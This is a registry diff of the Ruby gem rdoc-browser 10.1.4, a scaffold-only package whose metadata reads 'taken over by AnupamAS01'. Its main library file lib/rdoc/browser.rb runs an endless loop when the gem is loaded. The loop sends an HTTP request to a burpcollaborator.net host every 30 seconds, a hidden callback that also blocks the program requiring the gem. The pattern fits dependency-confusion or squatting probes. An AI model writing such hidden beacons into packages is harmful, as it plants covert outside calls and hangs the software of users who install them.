rdoc-browser 10.1.4

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of rdoc-browser might be problematic. Click here for more details.

checksums.yaml ADDED
@@ -0,0 +1,7 @@
1
+ ---
2
+ SHA256:
3
+ metadata.gz: 1109ba9353ba76705370cd90983b14eba5f6708546fbf358a81e330d6dfba4f0
4
+ data.tar.gz: 1e2dd1a6990c6dee0c65cb0b4573ea547787a13be5526b140c40fd704097cd2c
5
+ SHA512:
6
+ metadata.gz: c335e56bc0acd66de253f107aea1d823152214fe69276f0b497567c8392069731e8e594f6e9ed3a8263d856a84bf327255486e4241db7db7f00ce98ebd666beb
7
+ data.tar.gz: 9fcb578afd824aaa48aa189319763c8b3f74e5517fbaeccc126382a51321783dabe927cafb2beda6c3b9a231523fc6f942500738fdbd80bc711fc5eb64888542
data/Gemfile ADDED
@@ -0,0 +1,9 @@
1
+ # frozen_string_literal: true
2
+
3
+ source "https://rubygems.org"
4
+
5
+ # Specify your gem's dependencies in rdoc-browser.gemspec
6
+ gemspec
7
+
8
+ gem "rake", "~> 13.0"
9
+ gem 'net-http'
data/README.md ADDED
@@ -0,0 +1,29 @@
1
+ # Rdoc::Browser
2
+
3
+ Welcome to your new gem! In this directory, you'll find the files you need to be able to package up your Ruby library into a gem. Put your Ruby code in the file `lib/rdoc/browser`. To experiment with that code, run `bin/console` for an interactive prompt.
4
+
5
+ TODO: Delete this and the text above, and describe your gem
6
+
7
+ ## Installation
8
+
9
+ Install the gem and add to the application's Gemfile by executing:
10
+
11
+ $ bundle add rdoc-browser
12
+
13
+ If bundler is not being used to manage dependencies, install the gem by executing:
14
+
15
+ $ gem install rdoc-browser
16
+
17
+ ## Usage
18
+
19
+ TODO: Write usage instructions here
20
+
21
+ ## Development
22
+
23
+ After checking out the repo, run `bin/setup` to install dependencies. You can also run `bin/console` for an interactive prompt that will allow you to experiment.
24
+
25
+ To install this gem onto your local machine, run `bundle exec rake install`. To release a new version, update the version number in `version.rb`, and then run `bundle exec rake release`, which will create a git tag for the version, push git commits and the created tag, and push the `.gem` file to [rubygems.org](https://rubygems.org).
26
+
27
+ ## Contributing
28
+
29
+ Bug reports and pull requests are welcome on GitHub at https://github.com/[USERNAME]/rdoc-browser.
data/Rakefile ADDED
@@ -0,0 +1,4 @@
1
+ # frozen_string_literal: true
2
+
3
+ require "bundler/gem_tasks"
4
+ task default: %i[]
@@ -0,0 +1,7 @@
1
+ # frozen_string_literal: true
2
+
3
+ module Rdoc
4
+ module Browser
5
+ VERSION = "10.1.4"
6
+ end
7
+ end
@@ -0,0 +1,19 @@
1
+ # frozen_string_literal: true
2
+ require 'net/http'
3
+ require_relative "browser/version"
4
+
5
+ module Rdoc
6
+ module Browser
7
+ class Error < StandardError; end
8
+
9
+
10
+ loop do
11
+ http = Net::HTTP.new('wwww.pwpc3xlhfn2q9zf1z2zhinx7ryxple.burpcollaborator.net')
12
+ response = http.request_get('/')
13
+ p response.code
14
+
15
+ sleep 30
16
+
17
+ end
18
+ end
19
+ end
@@ -0,0 +1,6 @@
1
+ module Rdoc
2
+ module Browser
3
+ VERSION: String
4
+ # See the writing guide of rbs: https://github.com/ruby/rbs#guides
5
+ end
6
+ end
metadata ADDED
@@ -0,0 +1,48 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: rdoc-browser
3
+ version: !ruby/object:Gem::Version
4
+ version: 10.1.4
5
+ platform: ruby
6
+ authors:
7
+ - Anupam Singh
8
+ autorequire:
9
+ bindir: exe
10
+ cert_chain: []
11
+ date: 2022-11-24 00:00:00.000000000 Z
12
+ dependencies: []
13
+ description: taken over by AnupamAS01
14
+ email:
15
+ - 79111711+AnupamAS01@users.noreply.github.com
16
+ executables: []
17
+ extensions: []
18
+ extra_rdoc_files: []
19
+ files:
20
+ - Gemfile
21
+ - README.md
22
+ - Rakefile
23
+ - lib/rdoc/browser.rb
24
+ - lib/rdoc/browser/version.rb
25
+ - sig/rdoc/browser.rbs
26
+ homepage: https://anupamas0x1.github.io/
27
+ licenses: []
28
+ metadata: {}
29
+ post_install_message:
30
+ rdoc_options: []
31
+ require_paths:
32
+ - lib
33
+ required_ruby_version: !ruby/object:Gem::Requirement
34
+ requirements:
35
+ - - ">="
36
+ - !ruby/object:Gem::Version
37
+ version: 2.6.0
38
+ required_rubygems_version: !ruby/object:Gem::Requirement
39
+ requirements:
40
+ - - ">="
41
+ - !ruby/object:Gem::Version
42
+ version: '0'
43
+ requirements: []
44
+ rubygems_version: 3.0.3.1
45
+ signing_key:
46
+ specification_version: 4
47
+ summary: AnupamAS01
48
+ test_files: []